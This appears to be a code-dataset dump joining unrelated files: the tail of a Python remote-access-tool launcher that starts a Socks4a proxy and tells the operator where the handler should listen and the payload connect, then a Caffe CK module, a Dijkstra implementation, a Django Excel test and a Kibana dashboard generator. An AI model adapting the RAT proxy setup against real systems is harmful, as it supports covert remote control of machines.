globalClientCenter.logger.info("------------------! RAT Config !------------------")
globalClientCenter.logger.info("Socks4a on {}:{}".format(LISTEN_ADDR, LISTEN_PORT))
globalClientCenter.logger.info(
"Handler/LISTENER should listen on {}:{}".format(globalClientCenter.TARGET_IP, globalClientCenter.TARGET_PORT))
globalClientCenter.logger.info(
"Payload should connect to {}".format(MIRROR_LISTEN))
globalClientCenter.logger.info("------------------! RAT Config !------------------\n")
# 设置线程为守护线程
globalClientCenter.setDaemon(True)
t2 = Socks4aProxy(host=args.locallistenaddress, port=args.locallistenport, timeout=sockettimeout)
t2.setDaemon(True)
# 启动服务
globalClientCenter.start()
t2.start()
# 保持程序运行,处理结束信号
while True:
try:
time.sleep(10)
except KeyboardInterrupt as ki:
print('Caught KeyboardInterrupt, exiting')
sys.exit(1)
|
module/caffe/module.py | dividiti/ck-caffe | 212 | 12776667 | #
# Collective Knowledge (caffe CK front-end)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: cTuning foundation, <EMAIL>, http://cTuning.org
#
cfg={} # Will be updated by CK (meta description of this module)
work={} # Will be updated by CK (temporal data)
ck=None # Will be updated by CK (initialized CK kernel)
# Local settings
##############################################################################
# Initialize module
def init(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
return {'return':0}
##############################################################################
# crowd-benchmark caffe
def crowdbench(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
i['action']='crowdsource'
i['module_uoa']=cfg['module_deps']['experiment.bench.caffe']
return ck.access(i)
##############################################################################
# TBD: classification demo using webcam + benchmarking/tuning via CK
def demo(i):
"""
Input: {
(camera_id) - camera ID
(delay) - delay
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Deps
import time
import cv2
import os
# Prepare tmp entry if doesn't exist
duoa=cfg['demo']['data_uoa']
image_name=cfg['demo']['image_name']
r=ck.access({'action':'load',
'module_uoa':cfg['module_deps']['tmp'],
'data_uoa':duoa})
if r['return']>0:
if r['return']!=16: return r
r=ck.access({'action':'add',
'module_uoa':cfg['module_deps']['tmp'],
'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
pf=os.path.join(p, image_name)
# Initialize web cam
ci=int(i.get('camera_id',0))
dl=int(i.get('delay',1))
wcam = cv2.VideoCapture(ci)
# Permanent loop
while True:
ck.out('Obtaining picture from webcam ...')
s, img = wcam.read()
if s: # frame captured without any errors
# cv2.namedWindow("cam-test")
# cv2.imshow("cam-test",img)
# destroyWindow("cam-test")
cv2.imwrite(pf,img)
time.sleep(dl)
return {'return':0}
##############################################################################
# autotune Caffe workloads
def autotune(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
i['module_uoa']=cfg['module_deps']['program']
i['data_uoa']='caffe'
i['explore']='yes'
i['extra_tags']='dnn'
i['skip_collaborative']='yes'
i['skip_pruning']='yes'
i['iterations']=-1
i['new']='yes'
i['cmd_keys']=['time_cpu','time_gpu']
return ck.access(i)
|
Dijkstra's_Shortest_Path/Python/paveldedik/dijkstra.py | Mynogs/Algorithm-Implementations | 1,184 | 12776686 | <reponame>Mynogs/Algorithm-Implementations
def initialize(G, s):
"""Initialize graph G and vertex s."""
V, E = G
d = {v: float('inf') for v in V}
p = {v: None for v in V}
d[s] = 0
return d, p
def dijkstra(G, w, s):
"""Dijkstra's algorithm for shortest-path search."""
d, p = initialize(G, s)
V, E = G
S = set(V)
while S:
u = min(S, key=lambda x: d[x])
S = S - {u}
for (t, v) in E:
if t == u and d[v] > d[u] + w[u, v]:
d[v] = d[u] + w[u, v]
p[v] = u
return d, p # return distances and a tree representing shortest paths
if __name__ == '__main__':
V = ['A', 'B', 'C', 'D'] # vertexes
E = [('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'B')] # edges
w = {('A', 'B'): 1, ('B', 'C'): 3, ('B', 'D'): 1,
('C', 'D'): 8, ('D', 'B'): 2} # weights
print dijkstra((V, E), w, 'A')
|
tests/test_excel.py | hacklabr/django-rest-pandas | 1,097 | 12776688 | <gh_stars>1000+
from rest_framework.test import APITestCase
from tests.testapp.models import TimeSeries
from wq.io import load_file
class ExcelTestCase(APITestCase):
def setUp(self):
data = (
('2014-01-01', 0.5),
('2014-01-02', 0.4),
('2014-01-03', 0.6),
('2014-01-04', 0.2),
('2014-01-05', 0.1),
)
for date, value in data:
TimeSeries.objects.create(date=date, value=value)
def test_xls(self):
response = self.client.get("/timeseries.xls")
self.assertEqual(
'attachment; filename="Time Series.xls"',
response['content-disposition'],
)
xlfile = open('tests/output.xls', 'wb')
xlfile.write(response.content)
xlfile.close()
data = load_file("tests/output.xls")
self.assertEqual(len(data), 5)
self.assertEqual(data[0].date.year, 2014)
self.assertEqual(data[0].value, 0.5)
def test_xlsx(self):
response = self.client.get("/timeseries.xlsx")
self.assertEqual(
'attachment; filename="Time Series.xlsx"',
response['content-disposition'],
)
xlfile = open('tests/output.xlsx', 'wb')
xlfile.write(response.content)
xlfile.close()
data = load_file("tests/output.xlsx")
self.assertEqual(len(data), 5)
self.assertEqual(data[0].date.year, 2014)
self.assertEqual(data[0].value, 0.5)
|
dsio/dashboard/kibana.py | ufoioio/datastream.io | 897 | 12776692 | <filename>dsio/dashboard/kibana.py<gh_stars>100-1000
import elasticsearch
from kibana_dashboard_api import Visualization, Dashboard
from kibana_dashboard_api import VisualizationsManager, DashboardsManager
from ..exceptions import KibanaConfigNotFoundError
def generate_dashboard(es_conn, sensor_names, index_name, timefield='time',
update=True):
""" Generate a Kibana dashboard given a list of sensor names """
es_conn.index(index='.kibana', doc_type="index-pattern",
id=index_name,
body={
"title": index_name,
"timeFieldName": "time"
})
dashboards = DashboardsManager(es_conn)
dashboard = Dashboard()
dashboard.id = "%s-dashboard" % index_name
dashboard.title = "%s dashboard" % index_name
dashboard.panels = []
dashboard.options = {"darkTheme": True}
dashboard.time_from = "now-15m"
dashboard.refresh_interval_value = 5000
dashboard.search_source = {
"filter": [{
"query": {
"query_string": {
"analyze_wildcard": True,
"query": "*"
}
}
}]
}
visualizations = VisualizationsManager(es_conn)
vis_list = visualizations.get_all() # list all visualizations
panels = []
i = 0
for sensor in sensor_names:
viz_id = "%s-%s" % (index_name, sensor)
# Check if visualization exists
viz = next((v for v in vis_list if v.id == viz_id), None)
if not viz: # If not, create it
viz = Visualization()
viz.id = viz_id
viz.title = "%s-%s" % (index_name, sensor)
viz.search_source = {
"index": index_name,
"query":{
"query_string":{
"analyze_wildcard": True,
"query":"*"
}
},
"filter":[]
}
viz.vis_state = {
"title": "%s-%s" % (index_name, sensor),
"type": "line",
"params": {
"addLegend": True,
"addTimeMarker": True,
"addTooltip": True,
"defaultYExtents": True,
"drawLinesBetweenPoints": True,
"interpolate": "linear",
"radiusRatio": 9,
"scale": "linear",
"setYExtents": False,
"shareYAxis": True,
"showCircles": True,
"smoothLines": True,
"times":[],
"yAxis":{}
},
"aggs": [
{
"id": "1",
"type": "avg",
"schema":"metric",
"params": {
"field": sensor,
"customLabel": sensor.replace('_', ' ')
}
}, {
"id": "2",
"type": "max",
"schema":"radius",
"params": {
"field":"SCORE_%s" % sensor
}
}, {
"id": "3",
"type": "date_histogram",
"schema": "segment",
"params":{
"field": timefield,
"interval": "custom",
"customInterval": "5s",
"min_doc_count": 1,
"extended_bounds": {}
}
}
],
"listeners": {}
}
try:
res = visualizations.add(viz)
assert res['_id'] == viz_id
except elasticsearch.exceptions.ConflictError:
if update:
res = visualizations.update(viz)
panel = {
"id": viz_id,
"panelIndex": i,
"row": i,
"col": i,
"size_x": 7,
"size_y": 4,
"type": "visualization"
}
panels.append(panel)
ret = dashboard.add_visualization(viz)
i += 1
# Create the index if it does not exist
if not es_conn.indices.exists(index_name):
index_properties = {"time" : {"type": "date"}}
body = {"mappings": {index_name: {"properties": index_properties}}}
es_conn.indices.create(index=index_name, body=body)
try:
ret = dashboards.add(dashboard)
except elasticsearch.exceptions.ConflictError:
# Dashboard already exists, let's update it if we have to
if update:
ret = dashboards.update(dashboard)
# Create the index pattern
es_conn.index(index='.kibana', doc_type="index-pattern", id=index_name,
body={"title": index_name, "timeFieldName": "time"})
# Search for kibana config
kibana_config = es_conn.search(index='.kibana',
sort={'_uid': {'order': 'desc'}},
doc_type='config')
try:
kibana_id = kibana_config['hits']['hits'][0]['_id']
except:
raise KibanaConfigNotFoundError()
es_conn.update(index='.kibana', doc_type='config', id=kibana_id,
body={"doc": {"defaultIndex" : index_name}})
return ret
|
Subsets and Splits